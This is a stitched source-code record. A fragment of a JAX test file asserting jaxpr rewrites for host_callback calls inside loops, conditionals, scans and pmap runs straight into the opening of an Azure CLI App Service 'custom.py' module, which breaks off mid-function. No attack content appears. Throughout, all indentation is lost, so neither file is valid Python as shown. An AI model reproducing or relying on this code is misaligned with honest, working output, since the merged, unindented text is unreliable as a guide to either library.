if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = jax.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
from azure.cli.core.commands.client_factory import get_subscription_id
current_sub_id = get_subscription_id(cmd.cli_ctx)
if vnet_sub_id:
cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
cmd.cli_ctx.data['subscription_id'] = current_sub_id
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
